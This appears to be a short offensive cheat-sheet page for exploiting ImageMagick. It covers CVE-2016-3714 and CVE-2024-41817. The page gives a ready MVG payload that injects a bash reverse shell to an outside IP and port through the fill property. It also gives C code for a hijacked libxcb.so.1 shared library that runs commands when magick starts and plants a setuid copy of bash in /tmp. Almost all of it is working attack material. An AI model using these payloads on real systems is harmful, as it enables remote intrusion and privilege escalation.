ImageMagick
Check Version
magick -versionCVE-2016-3714
The exploit involves injecting arbitrary shell commands via the
fillproperty.The vulnerability primarily affects the following formats:
SVG,EPS,MVG,PDF,XML
push graphic-context
viewbox 0 0 640 480
fill 'url(https://1.1.1.1/tokyo.jpg"|bash -i >& /dev/tcp/10.10.16.5/4444 0>&1;echo "yay)'
pop graphic-contextCVE-2024-41817
Read about the POC
Build the shared library
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
EOFCheck that running magick runs id
magick /dev/null /dev/nullReplace id with a copy of bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cp /bin/bash /tmp/tokyo; chmod 6777 /tmp/tokyo");
exit(0);
}
EOFIn case you need to wait
sleep 45; ls -l /tmp/tokyoLast updated